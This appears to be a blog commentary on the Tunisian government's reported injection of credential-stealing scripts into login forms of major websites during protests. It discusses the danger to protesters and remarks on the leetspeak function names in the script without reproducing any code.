The Tunisian manipulation of the login forms on some of the world’s biggest sites could be a much needed wakeup call for more a more security aware approach to internet-based communication. The hack, if that’s an appropriate word in this context, potentially allowed the Tunisian government to get access to the private communication of hundreds of thousands of users – in the midst of violent nationwide protests.
One of the worst things that can happen to people protesting against an oppressive regime is to have their adversaries spying on them. Some information is by nature public, such as twitter feeds – and nobody should be surprised that governments are monitoring that information. But, there’s also tons of private correspondence, where the sender might be less careful with keeping their identity hidden. Think email, Facebook messages and closed groups.
The Tunisian case is, as far as I know, the only example we have where we have actual code to analyze. But without doubt, the method has been used before by other entities: whoever has control over a network, can insert malicious scripts as easily as child’s play. If you target the attack to only affect a smaller number of people – or even one specific individual – the chances of getting caught are very, very slim.
Most seem to be agreeing that the government instigated the Tunisian hack. The timing would certainly suggest so. The code however, bears no mark of a bureaucratic pen. Quite the opposite, actually.
The script that was inserted has some interesting traits. For some reason, the developer chose to name the functions using Leetspeak. We can find hAAAQ3d (hacked), wo0dh3ad (woodhead), us3r (user), pa55 (pass), h6h (hash) and inv0k (invoke) in right there in the code.
Leetspeak, the habit of replacing some characters with a digit (or other symbol), is a cliché of the hacker community. One of the first things you do, if you want to be taken seriously in the hacker underground, is to not speak leet. Yet, for some reason, leet pops up in this of all places.
The only reason I find to explain it is if the Tunisian government was trying to conceal its involvement and overcompensated. Big time.